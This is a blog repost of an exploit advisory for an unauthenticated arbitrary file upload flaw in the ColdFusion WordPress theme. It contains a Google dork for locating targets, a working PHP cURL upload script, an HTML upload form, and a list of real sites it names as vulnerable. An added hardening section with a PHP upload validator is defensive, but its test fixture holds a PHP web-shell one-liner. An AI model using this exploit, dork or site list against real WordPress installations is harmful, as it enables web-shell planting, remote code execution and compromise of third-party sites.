
WordPress theme ColdFusion Arbitrary File Upload Vulnerability

#-Title: WordPress theme ColdFusion Arbitrary File Upload Vulnerability
#-Author: Smail Max / Bet0
#-Date: 10/31/2013
#- Vendor : themeforest. net
#- Link Download : themeforest. net/item/coldfusion-responsive-fullscreen-video-image-audio/4381748
#-Google Dork: inurl:wp-content/themes/ColdFusion
#- Tested on : Win7, Linux
#- Fixed in : unknown (no fixed version was known when the advisory was published)
////////////////////////////////////////////////////////////////////////////////////////////

Bug information:

Bugtraq ID: 63523
Class: Input Validation Error
CVE: -
Remote: Yes
Local: No
Published: Nov 01 2013 12:00AM
Updated: Nov 01 2013 12:00AM
Credit: Bet0
Fingerprint (response body the advisory associates with a vulnerable endpoint, reproduced verbatim including the server's own typo): {"status":"NOK", "ERR":"This file is incorect"}

Description : 
The ColdFusion theme for WordPress is prone to an arbitrary file upload vulnerability. The theme ships a Uploadify-based handler, includes/uploadify/upload_settings_image.php, which accepts a multipart POST carrying a file in the Filedata field without requiring an authenticated WordPress user and without restricting the type of file it stores; the proof of concept below uploads a .php file through it.

An attacker can exploit this issue to upload PHP code and execute it in the context of the web server process, which amounts to remote code execution on the host. This may facilitate unauthorized access to the application; other attacks are also possible.


Solution:
The advisory's authors were not aware of any vendor-supplied patch at the time of publication. Until the theme is fixed, the exposure can be closed at the web server by denying direct requests to wp-content/themes/ColdFusion/includes/uploadify/ (or by removing upload_settings_image.php). Sites that ran the vulnerable handler should also be checked for recently written .php files under wp-content that do not belong to WordPress, the theme, or an installed plugin.
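The fix the advisory leaves open, as an added example that is not the ColdFusion theme's code nor the advisory author's: the validation a Uploadify-style image handler has to perform before writing anything from $_FILES['Filedata'] to disk. The function name validate_image_upload, the allow-lists, and the two sample files (a 1x1 PNG and a PHP one-liner) are assumptions constructed for this demonstration.

```php
<?php
// Added example, not code from the ColdFusion theme or the advisory.
// Hardening for an Uploadify-style image handler: the vulnerable endpoint
// wrote whatever arrived in $_FILES['Filedata'] to disk, so a .php file
// became a web shell. The checks below refuse anything that is not a
// genuine image and never reuse the client-supplied filename.
declare(strict_types=1);

// Extensions a client may claim, and the extension the server assigns for
// each MIME type it actually detects (both lists are assumptions for the example).
const ALLOWED_EXT = ['png', 'jpg', 'jpeg', 'gif'];
const MIME_TO_EXT = [
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
];

/**
 * Validate one uploaded file. $tmpPath is the received file (in a live
 * handler, $_FILES['Filedata']['tmp_name']); $clientName is the untrusted
 * name sent by the client. Returns the server-chosen destination filename,
 * or null when the upload must be refused.
 */
function validate_image_upload(string $tmpPath, string $clientName): ?string
{
    // 1. The claimed extension must be on the allow-list. This is only a cheap
    //    first gate: it rejects shell.php and shell.phtml, while a double
    //    extension such as shell.php.jpg passes here and is caught in step 2.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }

    // 2. Sniff the real content with libmagic. A PHP script renamed to
    //    shell.jpg is reported as text/x-php (or text/plain), not as an image.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($tmpPath);
    if ($mime === false || !isset(MIME_TO_EXT[$mime])) {
        return null;
    }

    // 3. Independent second opinion: the image header must actually decode.
    if (@getimagesize($tmpPath) === false) {
        return null;
    }

    // 4. Discard the client name entirely: a random name plus the extension
    //    matching the detected type, so the stored file is never mapped to the
    //    PHP interpreter by a web server that dispatches on extension.
    return bin2hex(random_bytes(16)) . '.' . MIME_TO_EXT[$mime];
}

/**
 * Stand-alone check with constructed inputs: a real 1x1 PNG and a PHP
 * one-liner, each offered under several client names. Returns true when
 * every case is decided as expected.
 */
function run_demo(): bool
{
    $png = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($png, base64_decode(
        'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=='
    ));
    $php = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($php, "<?php system(\$_GET['c']); ?>");

    $cases = [
        // [file, client-supplied name, should the upload be accepted?]
        [$png, 'logo.png',      true],   // genuine image
        [$png, 'LOGO.PNG',      true],   // extension check is case-insensitive
        [$php, '3xploi7.php',   false],  // the advisory's payload name
        [$php, 'shell.jpg',     false],  // PHP content lying about its extension
        [$php, 'shell.php.jpg', false],  // double extension
        [$png, 'logo.php',      false],  // real image under an executable name
    ];

    $ok = true;
    foreach ($cases as [$file, $name, $expectAccept]) {
        $result   = validate_image_upload($file, $name);
        $accepted = $result !== null;
        // An accepted file must also have been renamed away from the client name.
        if ($accepted !== $expectAccept || ($accepted && $result === $name)) {
            $ok = false;
        }
        printf("%-14s %s\n", $name, $accepted ? "accepted as $result" : 'refused');
    }
    unlink($png);
    unlink($php);
    return $ok;
}

exit(run_demo() ? 0 : 1);
```

Run it with `php hardened_upload.php` (the filename is an assumption); it exits 0 when every constructed case is classified as expected. Content validation is only half of the fix: the proofs of concept below send no cookie and no nonce, so a WordPress handler must also refuse the request unless check_ajax_referer() and current_user_can('upload_files') pass, and should hand the accepted file to wp_handle_upload() rather than writing into the theme directory.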

-- Proof Of Concept --

Remote exploit (PHP, POSTing the file in the "Filedata" field that the Uploadify handler expects; "localcrot" is the placeholder target host used in the original advisory):

<?php
// Local file to upload; the handler accepts it even though it is PHP source.
$uploadfile = "3xploi7.php";
$ch = curl_init("http://localcrot/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
// CURLFile replaces the old "@filename" upload syntax, which PHP 5.6+
// no longer honours by default (CURLOPT_SAFE_UPLOAD).
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata' => new CURLFile($uploadfile)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
// A rejected request comes back as the {"status":"NOK", ...} JSON shown above.
print $postResult;
?>

Via a browser form (labelled "CSRF" in the original advisory; because the handler requires no authentication, the form only has to be submitted, and no victim session is involved):

<form
action="http://localcrot/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>

If the upload succeeds (form method), the original advisory linked the resulting shell path as "Here"; the link target has not been preserved in this copy.

Demo sites (vulnerable instances listed in the original advisory, hostnames partially masked there):
http://www.laughinXgcowproductions.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
http://www.alias-phXoto.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php
http://www.manueXl-portela.com/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php




You are reading the article WordPress theme ColdFusion Arbitrary File Upload Vulnerability at the address https://minatoet.blogspot.com/2015/11/wordpress-theme-coldfusion-arbitrary.html
